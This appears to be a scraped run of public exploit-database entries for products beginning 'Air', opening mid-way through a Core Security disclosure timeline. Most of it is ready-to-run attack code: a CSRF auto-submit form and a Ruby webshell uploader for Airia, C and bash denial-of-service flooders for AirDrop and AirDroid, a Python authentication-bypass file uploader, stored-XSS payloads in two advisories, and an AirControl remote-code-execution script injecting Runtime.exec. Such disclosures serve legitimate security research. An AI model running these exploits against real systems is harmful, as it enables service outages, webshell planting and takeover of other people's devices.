2015-05-22: AirLink101 replied by email and asked when the advisory would be published without answering the previous question (PGP or plain text) and asked again for a contact phone number.
2015-05-26: Core Security replied to AirLink101 by email clarifying that they previously requested their input on whether they would prefer to receive the information encrypted or in plain text, and explained again that it is their policy to communicate using email.
2015-05-28: Core Security asked AirLink101 by email if they received their previous message.
2015-06-04: Core Security again asked AirLink101 if they were receiving their emails. They informed Airlink101 that if they didn't receive an answer soon they would be forced to publish their findings as a user release.
2015-06-16: Core Security informed AirLink101 that if they didn't receive an answer that week they would be forced to publish their findings.
2015-06-18: Core Security informed AirLink101 that it was their last chance to answer their emails, if not the advisory was going to be published on June 23, 2015.
2015-07-08: Advisory CORE-2015-0011 published.


9. References

[1] http://airlink101.com/products/aic1620w.php.
[2] http://www.airlink101.com/.


10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.


11. About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.


12. Disclaimer

The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
HireHackking 
<!--
# Exploit Title: Airia - CSRF Vulnerability(Add content)
# Date: 2016-06-20
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ytyng.com
# Software Link: https://github.com/ytyng/airia/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
-->

<form name="csrf_poc" action="http://127.0.0.1/vul_test/airia/editor.php" method="POST">
<input type="hidden" name="mode" value="save">
<input type="hidden" name="file" value="1">
<input type="hidden" name="scrollvalue" value="">
<input type="hidden" name="contents" value="CSRF Attack">
<input type="hidden" name="group" value="1">

<input type="submit" value="Replay!">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>
HireHackking 
# Exploit Title: Airia - Webshell Upload Vulnerability
# Date: 2016-06-20
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ytyng.com
# Software Link: https://github.com/ytyng/airia/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]

require "net/http"
require "uri"

if ARGV.length !=2
puts "Airia Webshell Upload Exploit(Vulnerability)"
puts "Usage: #>ruby airia_ws_exploit.rb [targetURL] [phpCode]"
puts "  targetURL(ex): http://127.0.0.1/vul_test/airia"
puts "  phpCode(ex): echo 'zzzzz'"
puts "  Example : ~~.rb http://127.0.0.1/vul_test/airia 'echo zzzz'"
puts "  exploit & code by hahwul[www.hahwul.com]"

else

target_url = ARGV[0]    # http://127.0.0.1/jmx2-Email-Tester/
shell = ARGV[1]    # PHP Code
exp_url = target_url + "/editor.php"
uri = URI.parse(exp_url)
http = Net::HTTP.new(uri.host, uri.port)

request = Net::HTTP::Post.new(uri.request_uri)
request["Accept"] = "*/*"
request["User-Agent"] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
request["Connection"] = "close"
request["Referer"] = "http://127.0.0.1/vul_test/airia/editor.php?file=1&group=%281%20AND%20%28SELECT%20SLEEP%2830%29%29%29%20--%20"
request["Accept-Language"] = "en"
request["Content-Type"] = "application/x-www-form-urlencoded"
request.set_form_data({"mode"=>"save",""=>"","file"=>"shell.php","scrollvalue"=>"","contents"=>"<?php echo 'Airia Webshell Exploit';#{shell};?>","group"=>"vvv_html"})
response = http.request(request)

puts "[Result] Status code: "+response.code
puts "[Result] Open Browser: "+target_url+"/data/vvv_html/shell.php"
end

=begin
### Run Step.

#> ruby 3.rb http://127.0.0.1/vul_test/airia "echo 123;"
[Result] Status code: 302
[Result] Open Browser: http://127.0.0.1/vul_test/airia/data/vvv_html/shell.php

output: Airia Webshell Exploit123

### HTTP Request / Response
[Request]
POST /vul_test/airia/editor.php HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://127.0.0.1/vul_test/airia/editor.php?file=1&group=%281%20AND%20%28SELECT%20SLEEP%2830%29%29%29%20--%20
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; DBSR_session=01ltbc0gf3i35kkcf5f6o6hir1; __utma=96992031.1679083892.1466384142.1466384142.1466384142.1; __utmb=96992031.2.10.1466384142; __utmc=96992031; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

mode=save&file=1.php&scrollvalue=&contents=<?php echo "Attack OK."?>&group=vvv_html

[Response] Uloaded file
http://127.0.0.1/vul_test/airia/data/vvv_html/1.html
=end
HireHackking 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

// ************************************************************************
// *                Author: Marcelo Vázquez (aka s4vitar)                 *
// *             AirDrop 2.0 Remote Denial of Service (DoS)               *
// ************************************************************************

// Exploit Title: AirDrop 2.0 Remote Denial of Service (DoS)
// Date: 2019-02-21
// Exploit Author: Marcelo Vázquez (aka s4vitar)
// Vendor Homepage: https://support.apple.com/en-us/HT204144
// Software Link: https://apkpure.com/airdrop-wifi-file-transfer/com.airdrop.airdroid.shareit.xender.filetransfer
// Version: <= AirDrop 2.0
// Tested on: Android

int make_socket(char *host, char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r;

    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
        exit(0);
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    if(p == NULL) {
        if(servinfo)
            freeaddrinfo(servinfo);
        fprintf(stderr, "No connection could be made\n");
        exit(0);
    }
    if(servinfo)
        freeaddrinfo(servinfo);
    fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
    return sock;
}

void broke(int s) {
    // Nothing to do
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
    int sockets[CONNECTIONS];
    int x, g=1, r;
    for(x=0; x!= CONNECTIONS; x++)
        sockets[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
        for(x=0; x != CONNECTIONS; x++) {
            if(sockets[x] == 0)
                sockets[x] = make_socket(host, port);
            r=write(sockets[x], "\0", 1);
            if(r == -1) {
                close(sockets[x]);
                sockets[x] = make_socket(host, port);
            }
        }
        usleep(300000);
    }
}

int main(int argc, char **argv) {

    int x;

    if (argc < 3) {
        printf("Usage: ./AirDrop_DoS <ip-address> <port>\n");
        exit(-1);
}

    for(x=0; x != THREADS; x++) {
        if(fork())
            attack(argv[1], argv[2], x);
        usleep(200000);
    }
    getc(stdin);
    return 0;
}
HireHackking 
Document Title:
===============
Airdroid iOS, Android & Win 3.1.3 - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1543


Release Date:
=============
2015-07-20


Vulnerability Laboratory ID (VL-ID):
====================================
1543


Common Vulnerability Scoring System:
====================================
3.9


Product & Service Introduction:
===============================
AirDroid allows you to access wirelessly and for free on your Android phone or tablet from Windows, Mac or the Internet, and to control it.

(Copy of the Product Homepage: https://www.airdroid.com/de/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side input validation web vulnerability in the official SandStudio AirDroid (windows, ios and android) mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-07-05: Researcher Notification & Coordination (Hadji Samir)
2015-07-06: Vendor Notification (Security Team)
2015-07-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Sand Studio
Product: AirDroid iOS Application (Andoird, Windows, MacOS & Web) 3.1.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered  in the official SandStudio AirDroid (windows, ios and android) mobile web-application.
The vulnerability allows remote attacker or low privilege user accounts to inject malicious codes to the application-side of the affected mobile web-application.

The vulnerability is located in the send messages and the send message with an attached file  module. Remote attackers with low privilege user account are able to upload file name 
with malicious strings like ``><script>alert(1).txt. On the arrival inbox occurs the execution of the malicious code that compromises the other target system/device user account.
The vulnerability is located on the application-side and the request method to inject is POST.

The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9.
Exploitation of the application-side web vulnerability requires a low privilege web-application user account and low user interaction.
Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent external redirect to malicious 
sources and application-side manipulation of affected or connected module context.

Request Method(s):
						[+] POST

Vulnerable Module(s):
						[+] Send Message

Vulnerable Parameter(s):
						[+] filename

Affected Module(s):
						[+] Message Inbox


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with low privilege application user account and low user interaction (click).
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC:
<span class="name">"><"><script>alert(document.cookie).txt< span="">[PERSISTENT INJECTED SCRIPT CODE]
    <span class="progress-rate">100%</span>
    <a class="attach-del-icon"></a>
</scrip...txt<></span>


--- PoC Session Logs [POST] ---
11:13:00.993[0ms][total 0ms] Status: pending[]
POST https://upload.airdroid.com/sms/attachment/?fn=%22%3E%3Cscript%3Ealert(document.cookie).txt&d=&after=0&rtype=0&origin=http%3A%2F%2Fweb.airdroid.com&country=DZ&fname=%22%3E%3Cscript%3Ealert(document.cookie).txt 
Load Flags[LOAD_BYPASS_CACHE  ] Content Size[unknown] Mime Type[unknown]
   Request Headers:
      Host[upload.airdroid.com]
      User-Agent[Mozilla/5.0 (X11; Linux i686; rv:39.0) Gecko/20100101 Firefox/39.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/octet-stream]
      Referer[http://web.airdroid.com/]
      Content-Length[5281]
      Origin[http://web.airdroid.com]
      Cookie[_SESSION=0b484eb230f27c004a7e990bace6175a416b58ed-%00_TS%3A1438769709%00; _ga=GA1.2.1046706455.1436177514; _gat=1; account_sid=c51d21b583ce76c04c8d4fa5a5c7496e; account_info=aW5mby5kaW1hbmV0QGdtYWlsLmNvbQ%3D%3D%2C63b971b729a756a3c1eb0fec6cccb736%2C9731220%2C59fd7af875fa5434a86e5397c79380d2]
   Post Data:
      POST_DATA[-PNG
	  
Note: We demonstrated the poc by usage of the web-app but the local app is also vulnerable to the same issue!


Solution - Fix & Patch:
=======================
The vulnerbaility can be patched by a secure parse and encode of the vulnerable filename value in the send message module with the attach file function.


Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the airdroid app is estimated as medium. (CVSS 3.9)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
#!/bin/bash

# *********************************************************************
# *             Author: Marcelo Vázquez (aka s4vitar)                 *
# *  AirDroid Denial of Service (DoS) & System Crash + Forced Reboot  *
# *********************************************************************

# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash + Forced Reboot
# Date: 2019-02-13
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Collaborators: Victor Lasa (aka vowkin)
# Vendor Homepage: https://web.airdroid.com/
# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en
# Version: <= AirDroid 4.2.1.6
# Tested on: Android

url=$1 # Example: http://192.168.1.46:8888
requests=0

trap ctrl_c INT

# If Ctrl+C key is pressed then the threads are killed
function ctrl_c() {
        echo -e "\n\n[*]Exiting...\n" && tput cnorm
        pkill curl > /dev/null 2>&1
        exit
}

# Detect number of arguments being passed to the program
if [ "$(echo $#)" == "1" ]; then
	# Infinite Loop
	tput cnorm && while true; do
		# We send 10000 requests in thread
		for i in $(seq 1 10000); do
			curl --silent "$url/sdctl/comm/lite_auth/" &
			let requests+=1
		done && wait # Here we wait for the threads to finish
	echo "Requests Sent: $requests"
	done
else
	echo -e "\nUsage: ./AirDroid_request.sh http://ip:port\n"
fi
HireHackking 
#/IN THE NAME OF GOD
#/auth====PARSA ADIB

import sys,requests,re,urllib2
def logo():
 print"\t\t       .__           .___             .__    .___"
 print"\t\t_____  |__|______  __| _/______  ____ |__| __| _/"
 print"\t\t\__  \ |  \_  __ \/ __ |\_  __ \/  _ \|  |/ __ | "
 print"\t\t / __ \|  ||  | \/ /_/ | |  | \(  <_> )  / /_/ | "
 print"\t\t(____  /__||__|  \____ | |__|   \____/|__\____ | "
 print"\t\t     \/               \/                      \/ "
 print "\t\tAIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib"
if len(sys.argv)<6 or len(sys.argv)>6 :
 logo()
 print "\t\tUSAGE:python exploit.py ip port remote-file-name local-file-name remote-file-path"
 print "\t\tEXAMPLE:python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard"
else :
 logo()
 print "\n[+]Reciving Details\n-----------------------------"
 try : 
  p = requests.get('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/ping/') 
 except IOError :
  print "\n[!] Check If server is Running"
  sys.exit()
 for i in p.content.split(',') :
  for char in '{"}_': 
   i = i.replace(char,'').upper()
  print "[*]"+i+""
 print "\n[+]Sending File\n-----------------------------"
 try :  
  r = requests.post('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/upload/dir?fn='+sys.argv[3]+'&d='+sys.argv[5]+'&after=1&fname='+sys.argv[3], files={sys.argv[4]: open(sys.argv[4], 'rb').read()})
  if (r.status_code == 200) :
   print "[*]RESPONSE:200"
   print "[*]FILE SENT SUCCESSFULY"
 except IOError :
  print "\n[!] Error"
HireHackking 
# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: http://www.app2pro.com
# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421
# CVE: N/A

Document Title:
===============
AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2203


Release Date:
=============
2020-04-15


Vulnerability Laboratory ID (VL-ID):
====================================
2203


Common Vulnerability Scoring System:
====================================
4.5


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
File sharing with other iOS devices via Bluetooth or Wi-Fi connection
with automatic search of nearest devices.
Users can perform file operations on the application like: Copy, Move,
Zip, Unzip, Rename, Delete, Email, and more.
Easy to create file like: Text File, New folder, Playlist, Take
Photo/Video, Import From Library, and Voice Record.
AirDisk Pro allows you to store, view and manage files on your iPhone,
iPad or iPod touch. You can connect to AirDisk
Pro from any Mac or PC over the Wi-Fi network and transfer files by drag
& drop files straight from the Finder or Windows
Explorer. AirDisk Pro features document viewer, PDF reader, music
player, image viewer, voice recorder, text editor, file
manager and support most of the file operations: like delete, move,
copy, email, share, zip, unzip and more.

(Copy of the Homepage:
https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 )
(Copy of the Homepage: http://www.app2pro.com )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile
application.


Affected Product(s):
====================
Felix Yew
Product: AirDisk Pro v5.5.3 (iOS)


Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerability has been
discovered in the official SuperBackup v2.0.5 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.

The first vulnerability is located in the `createFolder` parameter of
the `Create Folder` function. Attackers are able to name
or rename paths via airdisk pro ui to malicious persistent script codes.
Thus allows to execute the persistent injected script
code on the front site of the path index listing in the content itself
on each refresh. The request method to inject is POST
and the attack vector is located on the application-side. Interaction to
exploit is as well possible through the unauthenticated
started ftp service on the local network.

The second vulnerability is located in the `deleteFile` parameter of the
`Delete` function. The output location with the popup
that asks for permission to delete, allows to execute the script code.
The injection point is the file parameter and the execution
point occurs in the visible delete popup with the permission question.
The request method to inject is POST and the attack vector
is located on the application-side.

The third web vulnerability is located in the `devicename` parameter
that is displayed on the top next to the airdisk pro ui logo.
Remote attackers are able to inject own malicious persistent script code
by manipulation of the local apple devicename information.
The injection point is the devicename information and the execution
point occurs in the file sharing ui panel of the airdisk pro
mobile web-application.

Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack
vector of the vulnerability is persistent and the request method to
inject/execute is POST. The vulnerabilities are classic client-side
cross site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing
attacks, persistent external redirects to malicious source and
persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] AirDisk pro Wifi UI

Vulnerable Parameter(s):
[+] createFolder
[+] deleteFile
[+] devicename


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with wifi access with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


1. Create Folder

PoC: Vulnerable Source
<tbody>
<form name="checkbox_form"></form>
<tr><td class="e"><input type="checkbox" name="selection"
value="test"></td><td class="i"><a href="test/"><img
src="/webroot/fileicons/folder.png"
width="20" height="20"></a></td><td class="n"><a
href="test/">test</a></td><td class="m">11 Apr 2020 at 12:35</td><td
class="s"></td><td class="k">Folder</td>
<td class="e"><span style="height:15px;
width:15px;">&nbsp;</span></td><td class="e"><a href="#" title="Rename
file" onclick="modalPopup("test", 0, 0);">
<img src="/webroot/webrename.png" width="15" height="15"></a></td><td
class="e"><a href="#" title="Delete file"
onclick="modalPopup("test", 2, 0);">
<img src="/webroot/webdelete.png" width="15"
height="15"></a></td></tr><tr class="c"><td class="e"><input
type="checkbox" name="selection"
value="test%3E%22%3Ciframe%20src=a%3E"></td><td class="i"><a
href="[MALICIOUS INJECTED SCRIPT
CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">
<img src="/webroot/fileicons/folder.png" width="20"
height="20"></a></td><td class="n">
<a href="[MALICIOUS INJECTED SCRIPT
CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">test>"<iframe
src="evil.source"></a></td>
<td class="m">11 Apr 2020 at 13:01</td><td class="s"></td><td
class="k">Folder</td><td class="e"><span style="height:15px;
width:15px;">&nbsp;</span></td><td class="e">
<a href="#" title="Rename file"
onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS
INJECTED SCRIPT CODE!];, 0, 1);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
class="e">
<a href="#" title="Delete file"
onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS
INJECTED SCRIPT CODE!];, 2, 1);">
<img src="/webroot/webdelete.png" width="15"
height="15"/></a></td></tr><tr><td class="e"><input type="checkbox"
name="selection" value="Help.webarchive" /></td>
<td class="i"><a href="Help.webarchive"><img
src="/webroot/fileicons/webarchive.png" width="20"
height="20"></a></td><td class="n">
<a href="Help.webarchive">Help.webarchive</a></td><td class="m">6 Dec
2019 at 05:22</td><td class="s">13.7 KB</td><td class="k">Safari Web
Archive</td>
<td class="e"><a href="#" title="Download file"
onClick="downloadFile("Help.webarchive");"><img
src="/webroot/webdownload.png"
width="15" height="15"/></a></td><td class="e"><a href="#" title="Rename
file" onClick="modalPopup("Help.webarchive", 0, 2);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
class="e"><a href="#" title="Delete file"
onClick="modalPopup("Help.webarchive", 2, 2);"><img
src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr>
</form>
</tbody>
</table>
</div>


--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/
Upgrade-Insecure-Requests: 1
createFolder=test>"<[MALICIOUS INJECTED SCRIPT
CODE!]>&ID=0&submitButton=Create
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 6257

Note: Adding via ftp on mkdir or file is as well possible without
authentication on default setup.



2. Delete / Old Popup

PoC: Vulnerable Source
<div id="modal-content" class="simplemodal-data" style="display: block;">
	<div id="modal-title"><h3>Delete File</h3></div>
	<div id="modal-text"><a>Are you sure you want to delete this
file?"test"</a></div>
	<form name="input" action="" method="post">
	<div id="modal-field"><input type="hidden" name="deleteFile"
value="test"<iframe src="evil.source">[MALICIOUS INJECTED SCRIPT
CODE]"></div>
	<input type="hidden" name="ID" id="ID" value="test">
	<input type="submit" name="submitButton" id="submitButton" value="Delete">
	</form>
</div>


--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
deleteFile=New Folder&ID=New Folder&submitButton=Delete
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4699


Note: Comes up when somebody tries to delete the malicious injected path.


3. Devicename


PoC: Vulnerable Source
<div id="headerWraper">
	<table border="0" cellspacing="0" cellpadding="0" width="100%">
	  <tr>
	    <td><a href="./"><img src="/webroot/webicon.png" id="headerImg"
width="57" height="57"/></a></td>
	    <td><h2>[MALICIOUS INJECTED SCRIPT CODE AS DEVICENAME]</h2></td>	
	  </tr>
    </table>
</div>


--- PoC Session logs [GET] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4612

Note: Executes each time the wifi sharing ui service of airdisk pro is
opened by the local or remote users.


Solution - Fix & Patch:
=======================
1. Disallow special chars in the folder and filenames. Sanitize all
inputs and filter all involved parameters to  prevent application-side
attacks.
2. Parse the output location of the popup permission message content to
prevent further executions after injects via post method.
3. Sanitize the devicename displayed on top of the wifi user interaction
by a secure parsing mechanism.


Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
in the application functions are estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
HireHackking 
# Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution
# Date: 2020-06-03
# Exploit Author: 0xd0ff9 vs j3ssie
# Vendor Homepage: https://www.ui.com/
# Software Link: https://www.ui.com/download/#!utilities
# Version: AirControl <= 1.4.2
# Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml

import requests
import re
import urllib
import sys


print """USAGE: python exploit_aircontrol.py [url] [cmd]"""


url = sys.argv[1]
cmd = sys.argv[2]


burp0_url = url +"/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'"+cmd+"')))))}"
burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"}
r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False)

Locat =  r.headers["Location"]

